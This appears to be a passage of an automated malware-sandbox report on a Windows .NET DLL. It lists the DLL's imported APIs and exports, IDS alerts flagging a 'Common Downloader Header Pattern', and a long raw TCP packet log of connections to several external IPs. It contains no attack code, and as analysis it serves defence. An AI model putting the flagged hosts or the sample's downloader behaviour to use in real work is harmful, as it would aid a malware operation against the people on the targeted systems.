                                                                                                                                                                                              KERNEL32.dllRtlUnwindEx, InterlockedFlushSList, RtlPcToFileHeader, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, IsDebuggerPresent, InitializeSListHead, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, RaiseException, UnhandledExceptionFilter, QueryPerformanceCounter, SetLastError, FormatMessageW, GetLastError, GetCPInfoExW, GetConsoleMode, GetFileType, ReadFile, ReadConsoleW, WriteFile, WriteConsoleW, GetConsoleOutputCP, GetStdHandle, MultiByteToWideChar, WideCharToMultiByte, GetTickCount64, K32EnumProcessModulesEx, CloseHandle, IsWow64Process, GetExitCodeProcess, CreateProcessW, TerminateProcess, OpenProcess, K32EnumProcesses, K32GetModuleInformation, K32GetModuleBaseNameW, K32GetModuleFileNameExW, GetProcessId, DuplicateHandle, QueryFullProcessImageNameW, CreatePipe, GetCurrentProcess, GetConsoleCP, GetLogicalDrives, GetProcAddress, LoadLibraryW, LoadLibraryExW, CancelIoEx, CloseThreadpoolIo, GetCurrentProcessId, RaiseFailFastException, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToSystemTime, GetSystemTime, GetCalendarInfoEx, CompareStringOrdinal, CompareStringEx, FindNLSStringEx, GetLocaleInfoEx, EnumSystemLocalesEx, ResolveLocaleName, LCIDToLocaleName, GetUserPreferredUILanguages, FindStringOrdinal, GetCurrentThread, WaitForSingleObject, Sleep, DeleteCriticalSection, LocalFree, EnterCriticalSection, SleepConditionVariableCS, LeaveCriticalSection, WakeConditionVariable, InitializeCriticalSection, InitializeConditionVariable, CreateThreadpoolTimer, SetThreadpoolTimer, WaitForMultipleObjectsEx, GetCurrentThreadId, CreateThreadpoolWait, SetThreadpoolWait, WaitForThreadpoolWaitCallbacks, CloseThreadpoolWait, CreateThreadpoolWork, CloseThreadpoolWork, SubmitThreadpoolWork, QueryPerformanceFrequency, GetFullPathNameW, GetLongPathNameW, GetCPInfo, LocalAlloc, LocaleNameToLCID, LCMapStringEx, EnumTimeFormatsEx, EnumCalendarInfoExEx, CancelSynchronousIo, CreateIoCompletionPort, CopyFileExW, CreateDirectoryW, CreateFileW, CreateThreadpoolIo, StartThreadpoolIo, CancelThreadpoolIo, DeleteFileW, DeleteVolumeMountPointW, DeviceIoControl, ExpandEnvironmentStringsW, FindNextFileW, FindClose, FindFirstFileExW, FlushFileBuffers, FreeLibrary, GetCurrentDirectoryW, GetFileAttributesExW, GetFileInformationByHandleEx, GetModuleFileNameW, GetOverlappedResult, GetSystemDirectoryW, OpenThread, QueryUnbiasedInterruptTime, RemoveDirectoryW, SetFileAttributesW, SetFileInformationByHandle, SetFilePointerEx, SetThreadErrorMode, CreateThread, ResumeThread, GetThreadPriority, SetThreadPriority, GetDynamicTimeZoneInformation, GetTimeZoneInformation, GetCurrentProcessorNumberEx, SetEvent, ResetEvent, CreateEventExW, GetEnvironmentVariableW, SetEnvironmentVariableW, FlushProcessWriteBuffers, WaitForSingleObjectEx, RtlVirtualUnwind, RtlCaptureContext, RtlRestoreContext, AddVectoredExceptionHandler, FlsAlloc, FlsGetValue, FlsSetValue, CreateEventW, SwitchToThread, SuspendThread, GetThreadContext, SetThreadContext, FlushInstructionCache, VirtualAlloc, VirtualProtect, VirtualFree, QueryInformationJobObject, GetModuleHandleW, GetModuleHandleExW, GetProcessAffinityMask, InitializeContext, GetEnabledXStateFeatures, SetXStateFeaturesMask, InitializeCriticalSectionEx, VirtualQuery, GetSystemTimeAsFileTime, DebugBreak, SleepEx, GlobalMemoryStatusEx, GetSystemInfo, GetLogicalProcessorInformation, GetLogicalProcessorInformationEx, GetLargePageMinimum, VirtualUnlock, VirtualAllocExNuma, IsProcessInJob, GetNumaHighestNodeNumber, GetProcessGroupAffinity, K32GetProcessMemoryInfo, EncodePointer, DecodePointer, HeapCreate, HeapDestroy, HeapAlloc, HeapFree, GetProcessHeap, RtlLookupFunctionEntry
                                                                                                                                                                                              ncrypt.dllNCryptImportKey, NCryptOpenKey, NCryptDeleteKey, NCryptOpenStorageProvider, NCryptGetProperty, NCryptSetProperty, NCryptFreeObject
                                                                                                                                                                                              ole32.dllCoInitializeEx, CoGetObjectContext, CoUninitialize, CoTaskMemFree, CoTaskMemAlloc, CoGetApartmentType, CoGetContextToken, CoCreateGuid, CLSIDFromProgID, CoWaitForMultipleHandles
                                                                                                                                                                                              OLEAUT32.dllVariantClear, SysAllocStringLen, SysFreeString
                                                                                                                                                                                              USER32.dllLoadStringW
                                                                                                                                                                                              WS2_32.dllFreeAddrInfoExW, WSACleanup, WSASend, WSARecv, WSAGetOverlappedResult, WSAEventSelect, shutdown, setsockopt, WSAStartup, send, select, WSAIoctl, bind, GetNameInfoW, getpeername, getsockopt, ioctlsocket, WSAConnect, closesocket, GetAddrInfoExW, GetAddrInfoW, FreeAddrInfoW, WSASocketW, recv
                                                                                                                                                                                              api-ms-win-crt-heap-l1-1-0.dllcalloc, realloc, _callnewh, malloc, free
                                                                                                                                                                                              api-ms-win-crt-math-l1-1-0.dlltanf, nan, nanf, fmod, fmodf, atanf, tanh, ceil, cos, exp, floor, log, log10, pow, sin, tan, modf, ceilf, cosf, expf, floorf, logf, powf, sinf, modff, log2, atan2, fma, acosh, asinh, atanh, cosh, sinh, asinf, cbrt, acos, asin, atan, log2f, atan2f, fmaf, acoshf, asinhf, atanhf, coshf, sinhf, tanhf, log10f, cbrtf, acosf
                                                                                                                                                                                              api-ms-win-crt-string-l1-1-0.dll_stricmp, strcmp, strcpy_s, strncpy_s, wcsncmp
                                                                                                                                                                                              api-ms-win-crt-convert-l1-1-0.dllstrtoull
                                                                                                                                                                                              api-ms-win-crt-runtime-l1-1-0.dll_initterm, _initterm_e, _seh_filter_dll, _configure_narrow_argv, _initialize_narrow_environment, _initialize_onexit_table, _register_onexit_function, _execute_onexit_table, _crt_atexit, _cexit, terminate, abort
                                                                                                                                                                                              api-ms-win-crt-stdio-l1-1-0.dll__acrt_iob_func, __stdio_common_vfprintf, __stdio_common_vsprintf_s, __stdio_common_vsscanf
                                                                                                                                                                                              NameOrdinalAddress
                                                                                                                                                                                              AddNumbers10x18064ef20
                                                                                                                                                                                              DotNetRuntimeDebugHeader20x181bd7860
                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                              2025-01-14T13:13:37.686834+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449948172.65.251.78443TCP
                                                                                                                                                                                              2025-01-14T13:13:40.238724+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449966172.67.74.152443TCP
                                                                                                                                                                                              2025-01-14T13:13:40.860482+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449970172.67.74.152443TCP
                                                                                                                                                                                              2025-01-14T13:13:41.387537+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449974208.95.112.180TCP
                                                                                                                                                                                              2025-01-14T13:13:42.054391+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449978172.67.74.152443TCP
                                                                                                                                                                                              2025-01-14T13:13:42.656123+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449983172.67.74.152443TCP
                                                                                                                                                                                              2025-01-14T13:13:43.137986+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449989208.95.112.180TCP
                                                                                                                                                                                              2025-01-14T13:14:35.187230+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.450069172.67.74.152443TCP
                                                                                                                                                                                              2025-01-14T13:14:35.833230+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.450070172.67.74.152443TCP
                                                                                                                                                                                              2025-01-14T13:14:36.326610+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.450071208.95.112.180TCP
                                                                                                                                                                                              2025-01-14T13:14:36.956790+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.450072172.67.74.152443TCP
                                                                                                                                                                                              2025-01-14T13:14:37.563252+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.450073172.67.74.152443TCP
                                                                                                                                                                                              2025-01-14T13:14:38.025849+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.450074208.95.112.180TCP
                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                              Jan 14, 2025 13:13:36.999433041 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:36.999531984 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:36.999660969 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.012366056 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.012396097 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.499541044 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.499769926 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.501938105 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.501948118 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.502156019 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.544245958 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.557993889 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.599327087 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.686837912 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.686889887 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.686964989 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.686985016 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.686997890 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.687053919 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.687119961 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.687139988 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.687190056 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.687206984 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.687411070 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.687736034 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.687762022 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.687799931 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.687824011 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.687855959 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.691555977 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.691597939 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.691659927 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.691689968 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.691746950 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.779035091 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.779089928 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.779181957 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.779207945 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.779326916 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.779351950 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.779386044 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.779396057 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.779405117 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.779429913 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.780193090 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.780242920 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.780255079 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.780267954 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.780303955 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.780334949 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.780353069 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.780358076 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.780369043 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.781022072 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.781052113 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.781073093 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.781075954 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.781083107 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.781106949 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.781140089 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.781220913 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.781227112 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.781963110 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.781992912 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.782032967 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.782052040 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.782058954 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.782085896 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.782819986 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.782844067 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.782876015 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.782887936 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.782897949 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.782919884 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.825335026 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.871403933 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.871473074 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.871484995 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.871495008 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.871505022 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.871531010 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.871537924 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.871542931 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.871563911 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.871586084 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.872128010 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.872159004 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.872243881 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.872258902 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.872311115 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.872879982 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.872925997 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.872950077 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.872960091 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.872972012 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.872998953 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.873018980 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.873823881 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.873853922 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.873877048 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.873879910 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.873893023 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.873925924 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.873960018 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.874736071 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.874771118 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.874794960 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.874804974 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.874815941 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.874841928 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.874861002 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.875555992 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.875614882 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.875627041 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.875849009 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.963740110 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.963824034 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.963937998 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.963937998 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.963977098 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.964004993 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.964036942 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.964057922 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.964065075 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.964091063 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.964114904 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.964371920 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.964409113 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.964423895 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.964431047 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.964468956 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.964489937 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.964759111 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.964797974 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.964835882 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.964854002 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.964879036 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.964894056 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.964929104 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.964945078 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.964957952 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.964987993 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.965010881 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.965632915 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.965709925 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.965711117 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.965727091 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.965750933 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.965770006 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.965790033 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.965800047 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.965828896 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.965848923 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.965877056 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.965948105 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.965960026 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.965986967 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.966579914 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.966612101 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.966646910 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.966660023 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.966669083 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.966685057 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.966700077 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.966722965 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.966723919 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.966732979 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.966761112 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.966790915 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.967603922 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.967643976 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.967669964 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.967669964 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.967680931 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.967714071 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.967751980 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.967770100 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.967829943 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.968642950 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.968677044 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.968719006 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.968730927 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:37.968755960 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:37.968779087 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.056926966 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.056951046 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.057040930 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.057059050 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.057123899 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.057507038 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.057519913 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.057574987 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.057580948 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.057655096 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.057694912 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.057710886 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.057759047 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.057764053 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.057821989 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.062427998 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.062444925 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.062522888 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.062540054 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.062588930 CET49948443192.168.2.4172.65.251.78
                                                                                                                                                                                              Jan 14, 2025 13:13:38.062905073 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.062920094 CET44349948172.65.251.78192.168.2.4
                                                                                                                                                                                              Jan 14, 2025 13:13:38.062963009 CET49948443192.168.2.4172.65.251.78
